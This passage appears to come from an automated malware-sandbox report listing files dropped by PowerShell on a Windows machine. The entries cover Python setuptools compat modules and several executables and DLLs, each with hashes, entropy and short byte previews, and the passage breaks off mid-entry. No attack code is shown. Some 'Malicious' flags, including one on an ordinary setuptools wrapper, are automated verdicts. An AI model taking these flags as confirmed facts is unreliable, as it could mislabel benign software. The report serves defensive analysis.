                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:fgbucuXv/jFkA/gYtMn8ExK/mpKNxVlgHfnWdJDLjkGQ32esbtQI:1cOv/BF+npg/mpKNxfhDLjpQI
                                                                                                                                                                                                                              MD5:D29418B8C2FBB6D5981E26C241E12644
                                                                                                                                                                                                                              SHA1:7E2F2FB9BC23F6CE7DDF1C468C08E899FD002903
                                                                                                                                                                                                                              SHA-256:79E41718D8E256E9A62746BC8F545FC17B8CBE349C5D4785911A89513A153500
                                                                                                                                                                                                                              SHA-512:B34521D87500937D9680AEE274A4064A25CDF94B427A50D4723B1F67E2608216D4A14B0D2604AF8B2E0F7EACA093800DB78918327EAF83E5F6BBCCAA36AC224C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.VfJ...............................d.d.l.Z.d.d.l.Z.d.d...Z.y.)......Nc............................t.........j...................d.k\..r.t.........j...................|.|.............S...f.d...}.t.........j...................|.|.|...........S.).N)...........)...onexcc.................................|.|.|.d.............S.).N.......)...fn..path..excinfor....s.... ..HC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/compat/py311.py.._handlerz.shutil_rmtree.<locals>._handler....s...........R...w.q.z..*..*.....)...onerror)...sys..version_info..shutil..rmtree).r......ignore_errorsr....r....s.... ` r......shutil_rmtreer........s>................7.."....}.}.T.=....>..>....+......=.=...}.h..?..?r....).FN).r....r....r....r....r....r......<module>r........s...................@.r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):301
                                                                                                                                                                                                                              Entropy (8bit):5.151597537701632
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:ul+Mg94ZMtUFKH2VXlZDw52KNdAr8p7lK//IayleNP6g3j/n:uVDkyK6XlBKNxVlgAayleNhb
                                                                                                                                                                                                                              MD5:20BDA8103AD00CD809ADCCC7D381C87A
                                                                                                                                                                                                                              SHA1:B0FFA42275D4219BE117F65C041212549E0153BB
                                                                                                                                                                                                                              SHA-256:16CEC40D1C8E9A89399BE61A5F4086BC48CBDDD725016E050025695D600B9337
                                                                                                                                                                                                                              SHA-512:3B2E8846CC4D0ACE90F9C2B0237BDE774A25F8204EBF037505B04B8B9D5A95195C537CCEC05F395648C3A5C71CDED0726A6781195D464DF79A8F20E7B609AD02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................4.....d.d.l.Z.e.j...................d.k\..r.d.Z.y.d.Z.y.)......N).............locale)...sys..version_info..LOCALE_ENCODING........GC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/compat/py39.py..<module>r........s ...............".......'..9.(...t..r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):165
                                                                                                                                                                                                                              Entropy (8bit):4.460746031410453
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:JSnyv6RJRFo+Cri2YTFLCbQWgVHXMoQewMPsWAfuULEfvfxKhRYL4RHe1+CRK5Pn:kyqRZduQNHcoQ34sHfpw30hTBeGn
                                                                                                                                                                                                                              MD5:2C35C42BA2AD6070752E8243F5E22ACE
                                                                                                                                                                                                                              SHA1:F8FB0F4E093960457491F17889E2BD5DFDC2BA67
                                                                                                                                                                                                                              SHA-256:252A1E2C78A83B67F1D4B5466432FC20053FED20E9454DF75C19CF5CB4CC7723
                                                                                                                                                                                                                              SHA-512:FC26BB8723016F847FA92E5DB434CB979A03878AF91F2220FC63BB1C49B68035E225AD8E3B00F25023BBEF602B9CD2C9BC4DC875DAE6FE93D6C69DF0EB367334
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import sys...__all__ = ['tomllib']...if sys.version_info >= (3, 11):. import tomllib.else: # pragma: no cover. from setuptools.extern import tomli as tomllib.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):330
                                                                                                                                                                                                                              Entropy (8bit):4.513888892038619
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:kBnZY3AFeEoGG2gnuQoi9CXAFOLLkLHs6uRNMHwhARNtPFy9CXAFOLjav:kRWQQvGG2gnus9/0LLkLHjufhABPFy9V
                                                                                                                                                                                                                              MD5:8CDC53B124F264BF16CF4C97FBD23A0B
                                                                                                                                                                                                                              SHA1:D38C90E20899B298484DAFC335D58DE6690319DF
                                                                                                                                                                                                                              SHA-256:EAA7D12F9EEFD8358105076ABFEC3F4FBD0AC4AD22A3066208B5611127E3DFA6
                                                                                                                                                                                                                              SHA-512:B7579387DA538D31FDC94FCC556B904B72A502243405CFF1E1ED2C69DD4FD1A842F34FE2F2EA9323F0E5B7F96DDC378D0CF034E26D2147DE8139483941CEEB50
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import sys.import shutil...def shutil_rmtree(path, ignore_errors=False, onexc=None):. if sys.version_info >= (3, 12):. return shutil.rmtree(path, ignore_errors, onexc=onexc).. def _handler(fn, path, excinfo):. return onexc(fn, path, excinfo[1]).. return shutil.rmtree(path, ignore_errors, onerror=_handler).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):493
                                                                                                                                                                                                                              Entropy (8bit):4.908764573334926
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:kyWibLIie91CDPzenG99OSdFX/MeWo5JmMBNxWm7MynuYY4:ktg8d1CDPQtSdFjFrJQjynuYB
                                                                                                                                                                                                                              MD5:65EA231C4277485FF9A075EF2CDD6A28
                                                                                                                                                                                                                              SHA1:FBB495D6BC552623FFA5D7D8C0DD3A1E27893663
                                                                                                                                                                                                                              SHA-256:04932D9E47DCAB24DF71CAA3610C5FA11B54DA74E759A104481564B214E25EA6
                                                                                                                                                                                                                              SHA-512:19E1EF9C536A8F1C926CE2E6D82ACF08603549499DFEF9016A30F22265EE186CAFF4C79021C4675B69F62C8881BC77695BCAE31B0F8289E492F5F07481AA4C0C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import sys..# Explicitly use the ``"locale"`` encoding in versions that support it,.# otherwise just rely on the implicit handling of ``encoding=None``..# Since all platforms that support ``EncodingWarning`` also support.# ``encoding="locale"``, this can be used to suppress the warning..# However, please try to use UTF-8 when possible.# (.pth files are the notorious exception: python/cpython#77102, pypa/setuptools#3937)..LOCALE_ENCODING = "locale" if sys.version_info >= (3, 10) else None.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1499
                                                                                                                                                                                                                              Entropy (8bit):4.6077618379060175
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:224qvIDM3uDGPXhbLN28+SZlcgcYm68DgjBkTS4pic:22uDmoGPXhbh2pmcrnDg9kTS4Ac
                                                                                                                                                                                                                              MD5:F28D23FDC241F24190DE5197B72B5DEF
                                                                                                                                                                                                                              SHA1:3EF31C49BCA97D76E890DD3173F8D1B053585482
                                                                                                                                                                                                                              SHA-256:6A23E72FD0499F53BA31F9AE357CA7F16D8BA7CBBDAA2CD156AC0F88E74F2236
                                                                                                                                                                                                                              SHA-512:3BA4BDEBDF205B674D9EBFD6CF9CE614AF78E001E90F4ED60BDAA15B175E20A2CB3714C734B073266E87E1DB5581DA6C7ABC2CDBD94F2D75B0E644B95F158834
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""For backward compatibility, expose main functions from.``setuptools.config.setupcfg``."""..from functools import wraps.from typing import Callable, TypeVar, cast..from ..warnings import SetuptoolsDeprecationWarning.from . import setupcfg..Fn = TypeVar("Fn", bound=Callable)..__all__ = ('parse_configuration', 'read_configuration')...def _deprecation_notice(fn: Fn) -> Fn:. @wraps(fn). def _wrapper(*args, **kwargs):. SetuptoolsDeprecationWarning.emit(. "Deprecated API usage.",. f""". As setuptools moves its configuration towards `pyproject.toml`,. `{__name__}.{fn.__name__}` became deprecated... For the time being, you can use the `{setupcfg.__name__}` module. to access a backward compatible API, but this module is provisional. and might be removed in the future... To read project metadata, consider using. ``build.util.project_wheel_metadata`` (https://pypi.org/project/build/).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1997
                                                                                                                                                                                                                              Entropy (8bit):5.424816581861031
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:UpLEig8hpB3tQjwQZvMw2YcrnDcuxHMgDnWIpJvcn:CLbhb3ijVMuORNWIAn
                                                                                                                                                                                                                              MD5:699BAE689279FFF0C1A7E230ED1D5C7F
                                                                                                                                                                                                                              SHA1:748A108655E7B1D7760E3FD88535E50D1FA7F368
                                                                                                                                                                                                                              SHA-256:59757E8F2BC73F19488119454059CF818F2F36D4B3A98919C2AD8365DE8178FE
                                                                                                                                                                                                                              SHA-512:052BF9EA9D0EFE08E24253CD8AE23941DA8A1A09ADEDB43535E3842FEB3D45BAC4AA2EF0729DDD5E0B29D61A7366250D66B87FB0DEA1EF059481692585B9AC45
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf...............................d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.d.e...........Z.d.Z.d.e.d.e.f.d...Z...e.e.j...........................Z...e.e.j...........................Z.y.).zVFor backward compatibility, expose main functions from.``setuptools.config.setupcfg``......)...wraps)...Callable..TypeVar..cast.....)...SetuptoolsDeprecationWarning.....)...setupcfg..Fn)...bound)...parse_configuration..read_configuration..fn..returnc.....................J.......t.....................f.d...........}.t.........t.........|.........S.).Nc............................t.........j...................d.d.t...........d...j.....................d.t.........j.....................d.................|.i.|.....S.).Nz.Deprecated API usage.zZ. As setuptools moves its configuration towards `pyproject.toml`,. `...zG` became deprecated... For the time being, you can use the `a....` module. to access a backward compatible API, but
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):108409
                                                                                                                                                                                                                              Entropy (8bit):6.091579819444349
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+GBS:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+iS
                                                                                                                                                                                                                              MD5:12C4F239A1C6BD9CAF1EEC1E8F7E8987
                                                                                                                                                                                                                              SHA1:AC2E0F57A8FB5436EE35795787806B29FB46CA36
                                                                                                                                                                                                                              SHA-256:FC556DE8746FEA6839332A9CC15183BA88D13DFB5A3BE14753615DFA9DBF3B3C
                                                                                                                                                                                                                              SHA-512:86A74CC4F0837088DCDE8B1FB275B6474C12B10B745B55828010998D140380EB6C6F05AC848C5C06842D7D56EED34E57B6909E5E68C89BD588A828C189124FDB
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):108397
                                                                                                                                                                                                                              Entropy (8bit):6.091526204271518
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+Gp+:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+G+
                                                                                                                                                                                                                              MD5:C0CF2673BCCACCD8820344EF7DB1D4DC
                                                                                                                                                                                                                              SHA1:42CF206D9495D06B2289F1E03E62E4EEB857BB3C
                                                                                                                                                                                                                              SHA-256:A1DA7392AE5EF76DC68DFCBFA97E07525FDDB336DA1AEAF6DE06EF45FA60BE1F
                                                                                                                                                                                                                              SHA-512:AB1780DDF173A4EF0C2040EC558DAF75EBA6706FF185055437CEDD791E20C62FFA119DB18AB153A0DFE7E5C38D9CA3F984A18367E0EC0FCBAB2F44598E91DA20
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):108397
                                                                                                                                                                                                                              Entropy (8bit):6.091526204271518
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+Gp+:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+G+
                                                                                                                                                                                                                              MD5:C0CF2673BCCACCD8820344EF7DB1D4DC
                                                                                                                                                                                                                              SHA1:42CF206D9495D06B2289F1E03E62E4EEB857BB3C
                                                                                                                                                                                                                              SHA-256:A1DA7392AE5EF76DC68DFCBFA97E07525FDDB336DA1AEAF6DE06EF45FA60BE1F
                                                                                                                                                                                                                              SHA-512:AB1780DDF173A4EF0C2040EC558DAF75EBA6706FF185055437CEDD791E20C62FFA119DB18AB153A0DFE7E5C38D9CA3F984A18367E0EC0FCBAB2F44598E91DA20
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):108397
                                                                                                                                                                                                                              Entropy (8bit):6.091526204271518
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+Gp+:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+G+
                                                                                                                                                                                                                              MD5:C0CF2673BCCACCD8820344EF7DB1D4DC
                                                                                                                                                                                                                              SHA1:42CF206D9495D06B2289F1E03E62E4EEB857BB3C
                                                                                                                                                                                                                              SHA-256:A1DA7392AE5EF76DC68DFCBFA97E07525FDDB336DA1AEAF6DE06EF45FA60BE1F
                                                                                                                                                                                                                              SHA-512:AB1780DDF173A4EF0C2040EC558DAF75EBA6706FF185055437CEDD791E20C62FFA119DB18AB153A0DFE7E5C38D9CA3F984A18367E0EC0FCBAB2F44598E91DA20
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):108384
                                                                                                                                                                                                                              Entropy (8bit):6.091359799905948
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:1966Spw1RSGXwStXQR1mTqZh52bAGXHnDtCdGgYluexaNSxFfHYTo+Gb6:j8wDSRUT0kbAYn2GgYlBYN2fHYTo+46
                                                                                                                                                                                                                              MD5:B1E88953A18FA14E44B5818A0F6D90D9
                                                                                                                                                                                                                              SHA1:184959E5DC405B8720FF4F3F2C19481E974C83A1
                                                                                                                                                                                                                              SHA-256:4662F0A21FDD4F071D2C496ED9CF79F54AB3E3A2FCA7A679814A2FA55A6268BE
                                                                                                                                                                                                                              SHA-512:5427CEFCE886C3F877E3522E07E2FC3568B903439CB7561928298981AF544654478E94248E37D7E8E8DBE7AE2557498E5EC59E924C8C0912D639D760D31BFB23
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`v..%..%..%t.%..%...%..%...%...%...%..%..%..%..%...%...%..%...%..%...%..%Rich..%........................PE..d......b..........".................|B.........@..........................................@.....................................................<........S......@...............l...0................................................................................text...!........................... ..`.rdata..D8.......:..................@..@.data...DA...@......................@....pdata..@............B..............@..@.rsrc....S.......T...N..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):71448
                                                                                                                                                                                                                              Entropy (8bit):6.244392352614308
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:l7YaUr1ArXgA0dfKC0TIL1nOBC3QHVIjOn+7SyZx7:l7YaU1Arp0NKC0TIL1nKyYVIjOn+p
                                                                                                                                                                                                                              MD5:28D2A0405BE6DE3D168F28109030130C
                                                                                                                                                                                                                              SHA1:7151ECCBD204B7503F34088A279D654CFE2260C9
                                                                                                                                                                                                                              SHA-256:2DFCAEC25DE17BE21F91456256219578EAE9A7AEC5D21385DEC53D0840CF0B8D
                                                                                                                                                                                                                              SHA-512:B87F406F2556FAC713967E5AE24729E827F2112C318E73FE8BA28946FD6161802DE629780FAD7A3303CF3DBAB7999B15B535F174C85B3CBB7BB3C67915F3B8D0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l[.~...~...~.......~.......~.......~.......~.......~.......~.......~...~..=~.......~.......~.......~.......~..Rich.~..................PE..d...wK.f.........." ...&.f................................................... ............`.............................................P......d......................../..............T...........................@...@............................................text...%d.......f.................. ..`.rdata..pO.......P...j..............@..@.data...h...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):85272
                                                                                                                                                                                                                              Entropy (8bit):6.581027304618609
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:Va1z78QpNWk5qkCFM7Q4SPogYzR8WkiHH9IjCVz7SyqxJ:Va1zg5kWFqQ4Xz+Wkq9IjCVze
                                                                                                                                                                                                                              MD5:223FD6748CAE86E8C2D5618085C768AC
                                                                                                                                                                                                                              SHA1:DCB589F2265728FE97156814CBE6FF3303CD05D3
                                                                                                                                                                                                                              SHA-256:F81DC49EAC5ECC528E628175ADD2FF6BDA695A93EA76671D7187155AA6326ABB
                                                                                                                                                                                                                              SHA-512:9C22C178417B82E68F71E5B7FE7C0C0A77184EE12BD0DC049373EACE7FA66C89458164D124A9167AE760FF9D384B78CA91001E5C151A51AD80C824066B8ECCE6
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o~..+...+...+..."g..!...-...)...-.i.(...-...&...-...#...-.../...D...(...`g..)...+...t...D...#...D...*...D.k.*...D...*...Rich+...........................PE..d....K.f.........." ...&.....^...............................................`.......b....`.............................................H............@.......0..8......../...P..........T...........................p...@............................................text............................... ..`.rdata...>.......@..................@..@.data........ ......................@....pdata..8....0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):125208
                                                                                                                                                                                                                              Entropy (8bit):6.122025398643493
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:pmHf1MbO+o9/RZYMf/E2ZzKIyPFzqprhIjLPs6U:0uO+4/nLf/ET9qprGU
                                                                                                                                                                                                                              MD5:BBD5533FC875A4A075097A7C6ABA865E
                                                                                                                                                                                                                              SHA1:AB91E62C6D02D211A1C0683CB6C5B0BDD17CBF00
                                                                                                                                                                                                                              SHA-256:BE9828A877E412B48D75ADDC4553D2D2A60AE762A3551F9731B50CAE7D65B570
                                                                                                                                                                                                                              SHA-512:23EF351941F459DEE7ED2CEBBAE21969E97B61C0D877CFE15E401C36369D2A2491CA886BE789B1A0C5066D6A8835FD06DB28B5B28FB6E9DF84C2D0B0D8E9850E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&e..b..b..b..k|H.d..d..`..d..n..d..j..d..f.....`..)|.c..)|.d...x.a..b........d.....c....$.c.....c..Richb..................PE..d....K.f.........." ...&............\_..............................................j.....`.........................................``.......`.........................../......t.......T...............................@............................................text............................... ..`.rdata..Xl.......n..................@..@.data...,5.......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..t...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):251672
                                                                                                                                                                                                                              Entropy (8bit):6.565757128183933
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:1pR/rTVB5s99Rvft6yrsIzepnbux9qWM53pLW1Ad+ppp39PPPF8Sstvt:djLyvftDFzZUTK8SUvt
                                                                                                                                                                                                                              MD5:3055EDF761508190B576E9BF904003AA
                                                                                                                                                                                                                              SHA1:F0DC8D882B5CD7955CC6DFC8F9834F70A83C7890
                                                                                                                                                                                                                              SHA-256:E4104E47399D3F635A14D649F61250E9FD37F7E65C81FFE11F099923F8532577
                                                                                                                                                                                                                              SHA-512:87538FE20BD2C1150A8FEFD0478FFD32E2A9C59D22290464BF5DFB917F6AC7EC874F8B1C70D643A4DC3DD32CBE17E7EA40C0BE3EA9DD07039D94AB316F752248
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hW.....................f.......f.......f.......f.......f......................f.......f.......f.......f.......f......Rich............PE..d...yK.f.........." ...&.p...<......................................................i ....`..........................................D..P....E..................`'......./......T.......T...........................@...@............................................text...9o.......p.................. ..`.rdata..H............t..............@..@.data...X*...`...$...L..............@....pdata..`'.......(...p..............@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):133400
                                                                                                                                                                                                                              Entropy (8bit):6.437312765343779
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:2Yk2EZO7RNInHHgsyjub0ld2GugSdWp7dbbhqz632CwV2EtIj6fWm:2n8InHH9db0ldxYopphLGCwVVh
                                                                                                                                                                                                                              MD5:B479ED301E990690A30FC855E6B45F94
                                                                                                                                                                                                                              SHA1:177B508A602C5662350DAE853B5E9DB1475908A7
                                                                                                                                                                                                                              SHA-256:0C488E6883A70CD54A71A9E28796F87EF6CC0D288260A965CBB24BF1D7309A20
                                                                                                                                                                                                                              SHA-512:D410355BFE39A7666E7297D3654B0B8DD3919D4AE3BBF7D258ACDF76276ECC3BA3718F09BA708E3103D367EA6D352E98B6DE265E3746B973B421E0A68B8D37A8
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Oj.L..KL..KL..KEV.KB..KJ..JN..KJ..JA..KJ..JD..KJ..JO..K#..JN..K.V.JO..KL..K...K#..JH..K#..JM..K#..KM..K#..JM..KRichL..K........PE..d...{K.f.........." ...&.:..........|...............................................Z.....`.............................................X...X...x......................../......p....[..T............................Z..@............P...............................text....8.......:.................. ..`.rdata..Nk...P...l...>..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):65816
                                                                                                                                                                                                                              Entropy (8bit):6.241463396742061
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:6PSs3+S7z1FBV8HEmFRqeVIjOIf7Sy0xs:7szBVWEm/fVIjOIft
                                                                                                                                                                                                                              MD5:EEDB6D834D96A3DFFFFB1F65B5F7E5BE
                                                                                                                                                                                                                              SHA1:ED6735CFDD0D1EC21C7568A9923EB377E54B308D
                                                                                                                                                                                                                              SHA-256:79C4CDE23397B9A35B54A3C2298B3C7A844454F4387CB0693F15E4FACD227DD2
                                                                                                                                                                                                                              SHA-512:527BD7BB2F4031416762595F4CE24CBC6254A50EAF2CC160B930950C4F2B3F5E245A486972148C535F8CD80C78EC6FA8C9A062085D60DB8F23D4B21E8AE4C0AD
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~z.A:...:...:...3ca.>...<...8...<...6...<...2...<...9...U...8...qc..8.......9...:.......U...;...U...;...U...;...U...;...Rich:...........................PE..d....K.f.........." ...&.T..........L@..............................................lg....`.............................................P.............................../......X...@}..T............................|..@............p..(............................text...wS.......T.................. ..`.rdata..&O...p...P...X..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):160024
                                                                                                                                                                                                                              Entropy (8bit):6.841300813767097
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:EwpwQ7a8+OsGqtCXJznfF9mNo+pxAbm19IjZ1Tv:EwpV7a8FdNYO+pmC1i
                                                                                                                                                                                                                              MD5:05E8B2C429AFF98B3AE6ADC842FB56A3
                                                                                                                                                                                                                              SHA1:834DDBCED68DB4FE17C283AB63B2FAA2E4163824
                                                                                                                                                                                                                              SHA-256:A6E2A5BB7A33AD9054F178786A031A46EA560FAEEF1FB96259331500AAE9154C
